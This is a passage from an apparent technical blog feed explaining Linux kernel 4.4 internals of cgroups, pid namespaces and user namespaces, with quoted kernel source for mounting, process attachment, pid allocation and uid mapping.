WARN_ON(cgroup_add_legacy_cftypes(ss, ss->legacy_cftypes));
}
</code></pre></div></div>
<p>Finally, ‘cgroup_init’ creates the mount in ‘/sys/fs/cgroup’ by calling ‘sysfs_create_mount_point’, registers the ‘cgroup_fs_type’ so that the userspace can mount cgroup filesystem, creates the /proc/cgroups to show cgroup status.</p>
<h3> Cgroups VFS </h3>
<p>At the end of ‘cgroup_init’, a new filesystem ‘cgroup_fs_type’ is registered. This is the cgroup fs.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static struct file_system_type cgroup_fs_type = {
.name = "cgroup",
.mount = cgroup_mount,
.kill_sb = cgroup_kill_sb,
};
</code></pre></div></div>
<p>Every mount will create a new hierarchy, one or more subsystem can be attached to this hierarchy.
From the code perspective, ‘cgroup_mount’ a cgroup_root for one or more cgroup_subsys.</p>
<p>‘parse_cgroupfs_options’ is used to parse the options from mount system call and install it in a ‘cgroup_sb_opts’ opts. opts.subsys_mask stores the subsystem which want to attached to this new hierarchy.</p>
<p>Next the ‘cgroup_mount’ drain the unmounted subsystems.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> for_each_subsys(ss, i) {
if (!(opts.subsys_mask & (1 << i)) ||
ss->root == &cgrp_dfl_root)
continue;
if (!percpu_ref_tryget_live(&ss->root->cgrp.self.refcnt)) {
mutex_unlock(&cgroup_mutex);
msleep(10);
ret = restart_syscall();
goto out_free;
}
cgroup_put(&ss->root->cgrp);
}
</code></pre></div></div>
<p>Next ‘for_each_root(root)’ is used to check if the susbsystem has been mounted. If the ‘root’ is the ‘cgrp_dfl_root’, it means this subsystem is not mounted, just contine the loop. The subsystem mounted not once must match each other.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> if ((opts.subsys_mask || opts.none) &&
(opts.subsys_mask != root->subsys_mask)) {
if (!name_match)
continue;
ret = -EBUSY;
goto out_unlock;
}
</code></pre></div></div>
<p>This means, for example if we first mount cpu,cpuset in /sys/fs/cgroup/cpu,cpuset directory, then we can’t separately mount the cpu or cpuset subsystem. Instead we must also mount cpu,cpuset in a directory. If we have passed the check, then ‘kernfs_pin_sb’ is called to pin the already mounted superblock and just go to out_unlock. Then just mount the already mounted system to the new directory.</p>
<p>If instead, the susbsystem hasn’t been mounted, we need to allocate and initialize a new ‘cgroup_root’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root = kzalloc(sizeof(*root), GFP_KERNEL);
if (!root) {
ret = -ENOMEM;
goto out_unlock;
}
init_cgroup_root(root, &opts);
ret = cgroup_setup_root(root, opts.subsys_mask);
if (ret)
cgroup_free_root(root);
out_unlock:
mutex_unlock(&cgroup_mutex);
out_free:
kfree(opts.release_agent);
kfree(opts.name);
if (ret)
return ERR_PTR(ret);
</code></pre></div></div>
<p>And finally mount the new kernfs to the directory.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> dentry = kernfs_mount(fs_type, flags, root->kf_root,
CGROUP_SUPER_MAGIC, &new_sb);
if (IS_ERR(dentry) || !new_sb)
cgroup_put(&root->cgrp);
</code></pre></div></div>
<h3> Create a new cgroup </h3>
<p>When we create a directory in a subsystem’s fs root directory we create a new group. The kernfs’s syscall ops is set to ‘cgroup_kf_syscall_ops’ in ‘cgroup_setup_root’. And the mkdir handler is ‘cgroup_mkdir’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static struct kernfs_syscall_ops cgroup_kf_syscall_ops = {
.remount_fs = cgroup_remount,
.show_options = cgroup_show_options,
.mkdir = cgroup_mkdir,
.rmdir = cgroup_rmdir,
.rename = cgroup_rename,
};
</code></pre></div></div>
<p>Allocate a new ‘cgroup_root’ and initialize the new ‘cgroup_root’</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> cgrp = kzalloc(sizeof(*cgrp), GFP_KERNEL);
if (!cgrp) {
ret = -ENOMEM;
goto out_unlock;
}
ret = percpu_ref_init(&cgrp->self.refcnt, css_release, 0, GFP_KERNEL);
if (ret)
goto out_free_cgrp;
/*
* Temporarily set the pointer to NULL, so idr_find() won't return
* a half-baked cgroup.
*/
cgrp->id = cgroup_idr_alloc(&root->cgroup_idr, NULL, 2, 0, GFP_KERNEL);
if (cgrp->id < 0) {
ret = -ENOMEM;
goto out_cancel_ref;
}
init_cgroup_housekeeping(cgrp);
cgrp->self.parent = &parent->self;
cgrp->root = root;
</code></pre></div></div>
<p>Create the directory and create the files.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> kn = kernfs_create_dir(parent->kn, name, mode, cgrp);
if (IS_ERR(kn)) {
ret = PTR_ERR(kn);
goto out_free_id;
}
cgrp->kn = kn;
/*
* This extra ref will be put in cgroup_free_fn() and guarantees
* that @cgrp->kn is always accessible.
*/
kernfs_get(kn);
cgrp->self.serial_nr = css_serial_nr_next++;
/* allocation complete, commit to creation */
list_add_tail_rcu(&cgrp->self.sibling, &cgroup_parent(cgrp)->self.children);
atomic_inc(&root->nr_cgrps);
cgroup_get(parent);
/*
* @cgrp is now fully operational. If something fails after this
* point, it'll be released via the normal destruction path.
*/
cgroup_idr_replace(&root->cgroup_idr, cgrp, cgrp->id);
ret = cgroup_kn_set_ugid(kn);
if (ret)
goto out_destroy;
ret = css_populate_dir(&cgrp->self, NULL);
if (ret)
goto out_destroy;
</code></pre></div></div>
<p>Create and online a ‘cgroup_subsys_state’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> for_each_subsys(ss, ssid) {
if (parent->child_subsys_mask & (1 << ssid)) {
ret = create_css(cgrp, ss,
parent->subtree_control & (1 << ssid));
if (ret)
goto out_destroy;
}
}
</code></pre></div></div>
<h3> Attach process to a cgroup </h3>
<p>The process can be moved to a new ‘cgroup’ by writing the pid of process to cgroup’s cgroup.procs or tasks file. Let’s use the first as an example.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static struct cftype cgroup_legacy_base_files[] = {
{
.name = "cgroup.procs",
.seq_start = cgroup_pidlist_start,
.seq_next = cgroup_pidlist_next,
.seq_stop = cgroup_pidlist_stop,
.seq_show = cgroup_pidlist_show,
.private = CGROUP_FILE_PROCS,
.write = cgroup_procs_write,
},
</code></pre></div></div>
<p>The actually function is ‘__cgroup_procs_write’. It calls ‘cgroup_attach_task’ to attach a task to a cgroup.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static int cgroup_attach_task(struct cgroup *dst_cgrp,
struct task_struct *leader, bool threadgroup)
{
LIST_HEAD(preloaded_csets);
struct task_struct *task;
int ret;
/* look up all src csets */
spin_lock_bh(&css_set_lock);
rcu_read_lock();
task = leader;
do {
cgroup_migrate_add_src(task_css_set(task), dst_cgrp,
&preloaded_csets);
if (!threadgroup)
break;
} while_each_thread(leader, task);
rcu_read_unlock();
spin_unlock_bh(&css_set_lock);
/* prepare dst csets and commit */
ret = cgroup_migrate_prepare_dst(dst_cgrp, &preloaded_csets);
if (!ret)
ret = cgroup_migrate(leader, threadgroup, dst_cgrp);
cgroup_migrate_finish(&preloaded_csets);
return ret;
}
</code></pre></div></div>
<p>I won’t go to the detail of these function calls. The point is ‘cgroup_migrate’->’cgroup_taskset_migrate’:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> list_for_each_entry(cset, &tset->src_csets, mg_node) {
list_for_each_entry_safe(task, tmp_task, &cset->mg_tasks, cg_list) {
struct css_set *from_cset = task_css_set(task);
struct css_set *to_cset = cset->mg_dst_cset;
get_css_set(to_cset);
css_set_move_task(task, from_cset, to_cset, true);
put_css_set_locked(from_cset);
}
}
</code></pre></div></div>
<h3> How cgroup make an effect to process </h3>
<p>From above we know the cgroup internal implementation. Let’s see how it controls process.</p>
<p>The control is done by the subsystem. For example, when the kernel allocates or frees memory for a process, it will call ‘mem_cgroup_try_charge’ to let the memory cgroup invole to make sure the process will never exceed the limits.</p>
pid namespace internals2019-12-20T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2019/12/20/pid-namespace
<p>Namespace is another method to abstract resouces. A namespace make it appear to the process within the namespace that they
have their own isolated instance of the global resouces. Compared to the virtual machine, namespace is more lightweight. In this post, I will dig into the pid namespace from kernel part. I used kernel 4.4 in this post.</p>
<h3> Basic structure </h3>
<p>There are six different types of namespaces, they are uts, ipc, mount, pid, net and user. pid namespace is structured together in ‘nsproxy’ structure.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct nsproxy {
atomic_t count;
struct uts_namespace *uts_ns;
struct ipc_namespace *ipc_ns;
struct mnt_namespace *mnt_ns;
struct pid_namespace *pid_ns_for_children;
struct net *net_ns;
};
</code></pre></div></div>
<p>‘task_struct’ has a ‘nsproxy’ member pointing to a ‘struct nsproxy’ to represent the process’s resource view. struct ‘pid_namespace’ is used to represent a pid namespace.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct pid_namespace {
struct kref kref;
struct pidmap pidmap[PIDMAP_ENTRIES];
struct rcu_head rcu;
int last_pid;
unsigned int nr_hashed;
struct task_struct *child_reaper;
struct kmem_cache *pid_cachep;
unsigned int level;
struct pid_namespace *parent;
#ifdef CONFIG_PROC_FS
struct vfsmount *proc_mnt;
struct dentry *proc_self;
struct dentry *proc_thread_self;
#endif
#ifdef CONFIG_BSD_PROCESS_ACCT
struct fs_pin *bacct;
#endif
struct user_namespace *user_ns;
struct work_struct proc_work;
kgid_t pid_gid;
int hide_pid;
int reboot; /* group exit code if this pidns was rebooted */
struct ns_common ns;
};
</code></pre></div></div>
<p>pidmap member is a struct ‘pidmap’, it’s a bitmap to be used to managing pid value. It’s definition is quite easy.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct pidmap {
atomic_t nr_free;
void *page;
};
</code></pre></div></div>
<p>‘last_pid’ record the last used pid value. ‘child_reper’ is the init process of a pid_namespace. ‘user_ns’ points the user namespace of this pid namespace.</p>
<p>pid namespace is created by function ‘create_pid_namespace’ in the call chain of clone->copy_namespaces->copy_pid_ns->create_pid_namespace.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static struct pid_namespace *create_pid_namespace(struct user_namespace *user_ns,
struct pid_namespace *parent_pid_ns)
{
struct pid_namespace *ns;
unsigned int level = parent_pid_ns->level + 1;
int i;
int err;
if (level > MAX_PID_NS_LEVEL) {
err = -EINVAL;
goto out;
}
err = -ENOMEM;
ns = kmem_cache_zalloc(pid_ns_cachep, GFP_KERNEL);
if (ns == NULL)
goto out;
ns->pidmap[0].page = kzalloc(PAGE_SIZE, GFP_KERNEL);
if (!ns->pidmap[0].page)
goto out_free;
ns->pid_cachep = create_pid_cachep(level + 1);
if (ns->pid_cachep == NULL)
goto out_free_map;
err = ns_alloc_inum(&ns->ns);
if (err)
goto out_free_map;
ns->ns.ops = &pidns_operations;
kref_init(&ns->kref);
ns->level = level;
ns->parent = get_pid_ns(parent_pid_ns);
ns->user_ns = get_user_ns(user_ns);
ns->nr_hashed = PIDNS_HASH_ADDING;
INIT_WORK(&ns->proc_work, proc_cleanup_work);
set_bit(0, ns->pidmap[0].page);
atomic_set(&ns->pidmap[0].nr_free, BITS_PER_PAGE - 1);
for (i = 1; i < PIDMAP_ENTRIES; i++)
atomic_set(&ns->pidmap[i].nr_free, BITS_PER_PAGE);
return ns;
}
</code></pre></div></div>
<p>This function is quite easy, ‘ns->pidmap[0].page’ is the bitmap used to allocate/delete pid value.</p>
<p>‘create_pid_cachep’ is used to create the ‘struct pid’ cache. It is defined as following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct pid
{
atomic_t count;
unsigned int level;
/* lists of tasks that use this pid */
struct hlist_head tasks[PIDTYPE_MAX];
struct rcu_head rcu;
struct upid numbers[1];
};
struct upid {
/* Try to keep pid_chain in the same cacheline as nr for find_vpid */
int nr;
struct pid_namespace *ns;
struct hlist_node pid_chain;
};
</code></pre></div></div>
<p>Every process has a ‘struct pid’,</p>
<p>Following pic shows the data structure relation. A process may reference another ‘pid’, the ‘task’s in ‘struct pid’ is used for this. ‘struct upid’ stores the pid value in ‘nr’ member, the ‘pid_chain’ member is used to link the ‘struct upid’ in ‘pid_hash’ hash table.</p>
<p>For a process, it has a ‘level+1’ pid value, one in his pid namespace, and one for every his parent pid namespace. So in ‘create_pid_cachep’, it allocates a ‘struct pid’ and ‘level’ numbers of ‘struct upid’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static struct kmem_cache *create_pid_cachep(int nr_ids)
{
struct pid_cache *pcache;
struct kmem_cache *cachep;
mutex_lock(&pid_caches_mutex);
list_for_each_entry(pcache, &pid_caches_lh, list)
if (pcache->nr_ids == nr_ids)
goto out;
pcache = kmalloc(sizeof(struct pid_cache), GFP_KERNEL);
if (pcache == NULL)
goto err_alloc;
snprintf(pcache->name, sizeof(pcache->name), "pid_%d", nr_ids);
cachep = kmem_cache_create(pcache->name,
sizeof(struct pid) + (nr_ids - 1) * sizeof(struct upid),
0, SLAB_HWCACHE_ALIGN, NULL);
if (cachep == NULL)
goto err_cachep;
pcache->nr_ids = nr_ids;
pcache->cachep = cachep;
list_add(&pcache->list, &pid_caches_lh);
out:
mutex_unlock(&pid_caches_mutex);
return pcache->cachep;
}
</code></pre></div></div>
<h3> pid management </h3>
<p>‘struct pid’ is created by ‘alloc_pid’ called by ‘copy_process’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct pid *alloc_pid(struct pid_namespace *ns)
{
struct pid *pid;
enum pid_type type;
int i, nr;
struct pid_namespace *tmp;
struct upid *upid;
int retval = -ENOMEM;
pid = kmem_cache_alloc(ns->pid_cachep, GFP_KERNEL);
tmp = ns;
pid->level = ns->level;
for (i = ns->level; i >= 0; i--) {
nr = alloc_pidmap(tmp);
if (IS_ERR_VALUE(nr)) {
retval = nr;
goto out_free;
}
pid->numbers[i].nr = nr;
pid->numbers[i].ns = tmp;
tmp = tmp->parent;
}
if (unlikely(is_child_reaper(pid))) {
if (pid_ns_prepare_proc(ns)) {
disable_pid_allocation(ns);
goto out_free;
}
}
get_pid_ns(ns);
atomic_set(&pid->count, 1);
for (type = 0; type < PIDTYPE_MAX; ++type)
INIT_HLIST_HEAD(&pid->tasks[type]);
upid = pid->numbers + ns->level;
spin_lock_irq(&pidmap_lock);
if (!(ns->nr_hashed & PIDNS_HASH_ADDING))
goto out_unlock;
for ( ; upid >= pid->numbers; --upid) {
hlist_add_head_rcu(&upid->pid_chain,
&pid_hash[pid_hashfn(upid->nr, upid->ns)]);
upid->ns->nr_hashed++;
}
spin_unlock_irq(&pidmap_lock);
return pid;
}
</code></pre></div></div>
<p>Every process has ‘level+1’ pid value, one for every namespace that can see this process. In the first for loop, ‘alloc_pidmap’ return the pid value for this process in pid_namespace ‘tmp’. In the last for loop, we use the ‘upid->nr’ and ‘upid->ns’ as the key and insert the ‘struct upid’ to the crosspending ‘pid_hash’ table. In this function, we also initialize ‘pid->tasks’ list head. This list head is used to link the process that uses this ‘struct pid’. ‘struct pid_link’ is used to link the ‘task_struct’ and ‘pid’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct pid_link
{
struct hlist_node node;
struct pid *pid;
};
</code></pre></div></div>
<p>Here ‘node’ is the list entry links to ‘pid->tasks’. And ‘pid’ point to the ‘struct pid’. In ‘copy_process’, we can see following code:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> if (likely(p->pid)) {
ptrace_init_task(p, (clone_flags & CLONE_PTRACE) || trace);
init_task_pid(p, PIDTYPE_PID, pid);
if (thread_group_leader(p)) {
init_task_pid(p, PIDTYPE_PGID, task_pgrp(current));
init_task_pid(p, PIDTYPE_SID, task_session(current));
if (is_child_reaper(pid)) {
ns_of_pid(pid)->child_reaper = p;
p->signal->flags |= SIGNAL_UNKILLABLE;
}
p->signal->leader_pid = pid;
p->signal->tty = tty_kref_get(current->signal->tty);
list_add_tail(&p->sibling, &p->real_parent->children);
list_add_tail_rcu(&p->tasks, &init_task.tasks);
attach_pid(p, PIDTYPE_PGID);
attach_pid(p, PIDTYPE_SID);
__this_cpu_inc(process_counts);
} else {
current->signal->nr_threads++;
atomic_inc(&current->signal->live);
atomic_inc(&current->signal->sigcnt);
list_add_tail_rcu(&p->thread_group,
&p->group_leader->thread_group);
list_add_tail_rcu(&p->thread_node,
&p->signal->thread_head);
}
attach_pid(p, PIDTYPE_PID);
nr_threads++;
}
static inline void
init_task_pid(struct task_struct *task, enum pid_type type, struct pid *pid)
{
task->pids[type].pid = pid;
}
static inline struct pid *task_pgrp(struct task_struct *task)
{
return task->group_leader->pids[PIDTYPE_PGID].pid;
}
void attach_pid(struct task_struct *task, enum pid_type type)
{
struct pid_link *link = &task->pids[type];
hlist_add_head_rcu(&link->node, &link->pid->tasks[type]);
}
</code></pre></div></div>
<p>If the created thread is a thread group lead, we need to use the ‘current’ task_struct’s group leader to initialize ‘task->pids[PIDTYPE_PGID]’ and attach this created task to the group leader’s ‘pid->tasks’.</p>
<p>Following pic show the data structure relation.</p>
<p><img src="/assets/img/pidns/1.png" alt="" /></p>
user namespace internals2019-12-17T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2019/12/17/user-namespace
<p>Namespace is another method to abstract resouces. A namespace make it appear to the process within the namespace that they
have their own isolated instance of the global resouces. Compared to the virtual machine, namespace is more lightweight. In this post, I will dig into the user namespace from kernel part. I used kernel 4.4 in this post.</p>
<h3> Basic structure </h3>
<p>There are six different types of namespaces, they are uts, ipc, mount, pid, net and user. The former five namespaces is structured together in ‘nsproxy’ structure.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct nsproxy {
atomic_t count;
struct uts_namespace *uts_ns;
struct ipc_namespace *ipc_ns;
struct mnt_namespace *mnt_ns;
struct pid_namespace *pid_ns_for_children;
struct net *net_ns;
};
</code></pre></div></div>
<p>‘task_struct’ has a ‘nsproxy’ member pointing to a ‘struct nsproxy’ to present the process’s resource view. However the ‘struct nsproxy’ has no user namespace. User namespace is special as it is used for the process’s crendential. A user namespace is represented by ‘struct user_namespace’. ‘struct task_struct’s cred contains the process’s credential information. ‘struct cred’ has a ‘user_ns’ member to point the process’s namespace. ‘struct user_namespace’ has following definition:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct user_namespace {
struct uid_gid_map uid_map;
struct uid_gid_map gid_map;
struct uid_gid_map projid_map;
atomic_t count;
struct user_namespace *parent;
int level;
kuid_t owner;
kgid_t group;
struct ns_common ns;
unsigned long flags;
/* Register of per-UID persistent keyrings for this namespace */
#ifdef CONFIG_PERSISTENT_KEYRINGS
struct key *persistent_keyring_register;
struct rw_semaphore persistent_keyring_register_sem;
#endif
};
</code></pre></div></div>
<p>‘struct uid_gid_map’ defines the mapping of uid/gid between process user namespace and child namespace. ‘parent’ points to the parent user namespace. Just as other namespaces, user namespace has a hierarchy structure, the ‘level’ represent the level of hierarchy. ‘owner’/’group’ is the effective uid/gid of the process. ‘ns’ is the common structure of namespace.</p>
<p>‘struct uid_gid_map’ is defined as follows:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct uid_gid_map { /* 64 bytes -- 1 cache line */
u32 nr_extents;
struct uid_gid_extent {
u32 first;
u32 lower_first;
u32 count;
} extent[UID_GID_MAP_MAX_EXTENTS];
};
</code></pre></div></div>
<p>As we know, when we write to /proc/PID/uid_map, we define the process’s user namespace and his parent user namespace mapping of uid. The uid/gid_map has following format:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> ID-inside-ns ID-outside-ns length
</code></pre></div></div>
<p>Here ‘ID-inside-ns’ is the ‘uid_gid_extent’s ‘first’ member, ‘ID-outside-ns’ is the ‘uid_gid_extent’s ‘lower_first’ member and ‘length’ is the ‘count’ member. The uid/gid_map can have UID_GID_MAP_MAX_EXTENTS(5) lines. The ‘lower’ in ‘lower_first’ represent parent user namespace.</p>
<p>Following pic shows the data structure relation.</p>
<p><img src="/assets/img/userns/1.png" alt="" /></p>
<h3> System call behavior of user namespace </h3>
<h4> clone </h4>
<p>The most common way to create new namespaces is using clone system call. The most work is done in ‘copy_process’ function. ‘copy_creds’ is used to copy the parent’s cred and copy user namespace. The other namespaces is created in ‘copy_namespaces’ function.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> int copy_creds(struct task_struct *p, unsigned long clone_flags)
{
struct cred *new;
int ret;
...
new = prepare_creds();
if (!new)
return -ENOMEM;
if (clone_flags & CLONE_NEWUSER) {
ret = create_user_ns(new);
if (ret < 0)
goto error_put;
}
...
atomic_inc(&new->user->processes);
p->cred = p->real_cred = get_cred(new);
alter_cred_subscribers(new, 2);
validate_creds(new);
return 0;
}
</code></pre></div></div>
<p>If the userspace specify ‘CLONE_NEWUSER’, ‘copy_creds’ will call ‘create_user_ns’ to create a new user namespace.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> int create_user_ns(struct cred *new)
{
struct user_namespace *ns, *parent_ns = new->user_ns;
kuid_t owner = new->euid;
kgid_t group = new->egid;
int ret;
if (parent_ns->level > 32)
return -EUSERS;
/*
* Verify that we can not violate the policy of which files
* may be accessed that is specified by the root directory,
* by verifing that the root directory is at the root of the
* mount namespace which allows all files to be accessed.
*/
if (current_chrooted())
return -EPERM;
/* The creator needs a mapping in the parent user namespace
* or else we won't be able to reasonably tell userspace who
* created a user_namespace.
*/
if (!kuid_has_mapping(parent_ns, owner) ||
!kgid_has_mapping(parent_ns, group))
return -EPERM;
ns = kmem_cache_zalloc(user_ns_cachep, GFP_KERNEL);
if (!ns)
return -ENOMEM;
ret = ns_alloc_inum(&ns->ns);
if (ret) {
kmem_cache_free(user_ns_cachep, ns);
return ret;
}
ns->ns.ops = &userns_operations;
atomic_set(&ns->count, 1);
/* Leave the new->user_ns reference with the new user namespace. */
ns->parent = parent_ns;
ns->level = parent_ns->level + 1;
ns->owner = owner;
ns->group = group;
/* Inherit USERNS_SETGROUPS_ALLOWED from our parent */
mutex_lock(&userns_state_mutex);
ns->flags = parent_ns->flags;
mutex_unlock(&userns_state_mutex);
set_cred_user_ns(new, ns);
#ifdef CONFIG_PERSISTENT_KEYRINGS
init_rwsem(&ns->persistent_keyring_register_sem);
#endif
return 0;
}
</code></pre></div></div>
<p>First we need do some check. The namespace’s level can has 32 maximum. The chrooted process can’t create namespace. The creator also need to has a mapping in the parent user namespace so that we can track the namespace’s parental relation. ‘kuid_has_mapping’ has following definition:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static inline bool kuid_has_mapping(struct user_namespace *ns, kuid_t uid)
{
return from_kuid(ns, uid) != (uid_t) -1;
}
uid_t from_kuid(struct user_namespace *targ, kuid_t kuid)
{
/* Map the uid from a global kernel uid */
return map_id_up(&targ->uid_map, __kuid_val(kuid));
}
static u32 map_id_up(struct uid_gid_map *map, u32 id)
{
unsigned idx, extents;
u32 first, last;
/* Find the matching extent */
extents = map->nr_extents;
smp_rmb();
for (idx = 0; idx < extents; idx++) {
first = map->extent[idx].lower_first;
last = first + map->extent[idx].count - 1;
if (id >= first && id <= last)
break;
}
/* Map the id or note failure */
if (idx < extents)
id = (id - first) + map->extent[idx].first;
else
id = (u32) -1;
return id;
}
</code></pre></div></div>
<p>The ‘creator’(parent process’ euid) must has a mapping in the parent namespace. If not, the child namespace will has no information who created a user namespace.</p>
<p>After all thess check, ‘create_user_ns’ allocates a ‘user_namespace’ struct and do some intialization. We need to set the new created user_namespace’s parent to its parent user_namespace, and add its level. Finally in ‘set_cred_user_ns’ the ‘cred’s ‘user_ns’ member is set to the newly created ‘user_namespace’.</p>
<h4> unshare </h4>
<p>The unshare system call is easy, as it just create a new user_namespace for the caller process.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> int unshare_userns(unsigned long unshare_flags, struct cred **new_cred)
{
struct cred *cred;
int err = -ENOMEM;
if (!(unshare_flags & CLONE_NEWUSER))
return 0;
cred = prepare_creds();
if (cred) {
err = create_user_ns(cred);
if (err)
put_cred(cred);
else
*new_cred = cred;
}
return err;
}
</code></pre></div></div>
<h4> setns </h4>
<p>Another way we can change the process to a new user namespace is using setns system call. This system call need a fd reffering to a namespace, which is in /proc/PID/ns/xxx.
‘create_new_namespaces’ function does nothing for user namespace. The calling ‘ns->ops->install’ does the work. First get ths ‘ns_common’ struct from the ‘file struct’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> SYSCALL_DEFINE2(setns, int, fd, int, nstype)
{
struct task_struct *tsk = current;
struct nsproxy *new_nsproxy;
struct file *file;
struct ns_common *ns;
int err;
file = proc_ns_fget(fd);
ns = get_proc_ns(file_inode(file));
if (nstype && (ns->ops->type != nstype))
goto out;
new_nsproxy = create_new_namespaces(0, tsk, current_user_ns(), tsk->fs);
err = ns->ops->install(new_nsproxy, ns);
switch_task_namespaces(tsk, new_nsproxy);
out:
fput(file);
return err;
}
</code></pre></div></div>
<p>For user namespace, the ‘ns->ops->install’ callback is ‘userns_install’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static int userns_install(struct nsproxy *nsproxy, struct ns_common *ns)
{
struct user_namespace *user_ns = to_user_ns(ns);
struct cred *cred;
/* Don't allow gaining capabilities by reentering
* the same user namespace.
*/
if (user_ns == current_user_ns())
return -EINVAL;
/* Tasks that share a thread group must share a user namespace */
if (!thread_group_empty(current))
return -EINVAL;
if (current->fs->users != 1)
return -EINVAL;
if (!ns_capable(user_ns, CAP_SYS_ADMIN))
return -EPERM;
cred = prepare_creds();
if (!cred)
return -ENOMEM;
put_user_ns(cred->user_ns);
set_cred_user_ns(cred, get_user_ns(user_ns));
return commit_creds(cred);
}
</code></pre></div></div>
<p>First get a ‘user_namespace’ from a ‘ns_common’ struct. After doing some check, it ‘set_cred_user_ns’ to set the process’ cred’s ‘user_ns’ member to the fd referring to.</p>
<h4> getuid </h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> SYSCALL_DEFINE0(getuid)
{
/* Only we change this so SMP safe */
return from_kuid_munged(current_user_ns(), current_uid());
}
uid_t from_kuid_munged(struct user_namespace *targ, kuid_t kuid)
{
uid_t uid;
uid = from_kuid(targ, kuid);
if (uid == (uid_t) -1)
uid = overflowuid;
return uid;
}
</code></pre></div></div>
<p>The ‘current_uid’ return the user’s UID. ‘from_kuid’ return the mapping uid of ‘kuid’ in user namespace ‘targ’. If there is no mapping. the ‘overlowuid’ is returned. This is ‘DEFAULT_OVERFLOWUID’. This is why we get following result if we just create a user namespace and not set the /proc/PID/uid_map mapping file.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> test@ubuntu:~/nstest$ unshare -U
nobody@ubuntu:~/nstest$ id
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
</code></pre></div></div>
<h3> User namespace hierarchy </h3>
<p>From the last part, every user namespace has a parent except the ‘init_user_ns’. ‘init_user_ns’ is hard-coded in the kernel as following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct user_namespace init_user_ns = {
.uid_map = {
.nr_extents = 1,
.extent[0] = {
.first = 0,
.lower_first = 0,
.count = 4294967295U,
},
},
.gid_map = {
.nr_extents = 1,
.extent[0] = {
.first = 0,
.lower_first = 0,
.count = 4294967295U,
},
},
.projid_map = {
.nr_extents = 1,
.extent[0] = {
.first = 0,
.lower_first = 0,
.count = 4294967295U,
},
},
.count = ATOMIC_INIT(3),
.owner = GLOBAL_ROOT_UID,
.group = GLOBAL_ROOT_GID,
.ns.inum = PROC_USER_INIT_INO,
#ifdef CONFIG_USER_NS
.ns.ops = &userns_operations,
#endif
.flags = USERNS_INIT_FLAGS,
#ifdef CONFIG_PERSISTENT_KEYRINGS
.persistent_keyring_register_sem =
__RWSEM_INITIALIZER(init_user_ns.persistent_keyring_register_sem),
#endif
};
</code></pre></div></div>
<p>As we can see, the uid/gid mapping is the identical mapping. So if the process not use user namespace there is no effective. Les’t take an example. Say we have a user which uid is 1000. Its user namespace is the ‘init_user_ns’.</p>
<p><img src="/assets/img/userns/2.png" alt="" /></p>
<p>Then the user creates two user namespaces named ‘us1’ and ‘us2’. The ‘us1’ has a ‘0 1000 20’ uid_map and the ‘us2’ has a ‘200 1000 20’ uid_map. When write to the /proc/PDI/uid_map file.
The ‘proc_uid_map_write’ is called and finally ‘map_write’ is called. In this function we can see how the ‘uid_gid_map’ is constructed.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> extent->first = simple_strtoul(pos, &pos, 10);
if (!isspace(*pos))
goto out;
pos = skip_spaces(pos);
extent->lower_first = simple_strtoul(pos, &pos, 10);
if (!isspace(*pos))
goto out;
pos = skip_spaces(pos);
extent->count = simple_strtoul(pos, &pos, 10);
if (*pos && !isspace(*pos))
goto out;
</code></pre></div></div>
<p>When the userspace read /proc/PID/uid_map, it uses a seq_file method. When the file is opened, the kernel calls ‘proc_id_map_open’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static int proc_id_map_open(struct inode *inode, struct file *file,
const struct seq_operations *seq_ops)
{
struct user_namespace *ns = NULL;
struct task_struct *task;
struct seq_file *seq;
